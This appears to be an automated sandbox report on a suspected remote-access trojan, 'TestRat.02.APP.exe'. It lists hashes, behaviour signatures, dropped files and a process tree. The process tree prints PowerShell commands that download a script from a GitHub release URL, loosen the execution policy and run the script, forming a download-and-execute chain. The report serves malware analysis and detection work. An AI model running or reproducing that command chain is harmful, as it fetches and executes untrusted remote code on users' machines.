Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags
    arch:x64, arch:x86, image:win11-20240709-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    22/07/2024, 17:00 UTC

General

  • Target

    TestRat.02.APP.exe

  • Size

    139KB

  • MD5

    6d75b31bfa691bdf32c0c9331c8b7ff7

  • SHA1

    5387d89075eb924adca7318add02c0bca8812a9e

  • SHA256

    fb1e3c46ce349e7ae853621f708fe0bfa08e142b6f6262dc9ab6f8e03cb5380f

  • SHA512

    ca08fd9ed2543ff13167f57e27fe4fbb6a395161e25902b7c9ec562034f6cb9aa24f2a32c04341b5ac29c49bd683393856742bd0f400e2c0cc660760ab2b7b83

  • SSDEEP

    3072:CAi4pxpEHmAdx4/kyHRZa0YiRAl278IVn2JbS1cJA8lW7:CAi4pxpRkyHRZa0Gl278IVNc2cW

Score
8/10

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    PowerShell Invoke-WebRequest.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\TestRat.02.APP.exe
    "C:\Users\Admin\AppData\Local\Temp\TestRat.02.APP.exe"
    PID:996
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Invoke-WebRequest -Uri https://github.com/Daulaires/Daulaires/releases/download/Lester/quick_setup.ps1 -OutFile quick_setup.ps1
      PID:4680
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-ExecutionPolicy RemoteSigned -Scope CurrentUser -Force
      PID:4092
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" .\quick_setup.ps1
      PID:1564
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    PID:1468

    Network


    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      4ef3b165311abe48029443c0a529747f

      SHA1

      ad65cc913ed3805d813bc16337c7f6d2a97b55d9

      SHA256

      c2c563dddc3df7fda0e246d9988718b315a9704335312d5ddfb1768efa1655ff

      SHA512

      696e3deb942e4f6d3980a831668bfd40a8bee586cca3e4ca5a85aeae482af5c8c5ae21e319b4483345c582b7a61d51220c8ccce0072497a8ee53e1e87ac5e99a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      e3840d9bcedfe7017e49ee5d05bd1c46

      SHA1

      272620fb2605bd196df471d62db4b2d280a363c6

      SHA256

      3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

      SHA512

      76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      b94a5f9c019b614942fc29d049e77006

      SHA1

      7d22a700e14c52c6ded2a26cc063057b779d5c2e

      SHA256

      ac01c39f1027c82f8d739b7a15c8fc17875bf33f3069f9acf0eb4a0d3b8803d7

      SHA512

      301825dd58920d02a28650c9bd9a43d36d5d896fa72b79b49792a868f2df4d419dd6fdfe245f544f8becaff9585e63050fe2e6979dbc35a592017423a392633e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1wdrrbu4.3aj.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1564-27-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

    • memory/1564-18-0x000001F777E80000-0x000001F777EA2000-memory.dmp

      Filesize

      136KB

    • memory/1564-29-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

    • memory/1564-40-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

    • memory/1564-36-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

    • memory/4092-34-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

    • memory/4092-35-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

    • memory/4092-30-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

    • memory/4092-28-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

    • memory/4680-31-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

    • memory/4680-0-0x00007FFC8BA83000-0x00007FFC8BA85000-memory.dmp

      Filesize

      8KB

    • memory/4680-9-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

    • memory/4680-44-0x00000228BAF80000-0x00000228BB08A000-memory.dmp

      Filesize

      1.0MB

    • memory/4680-45-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB
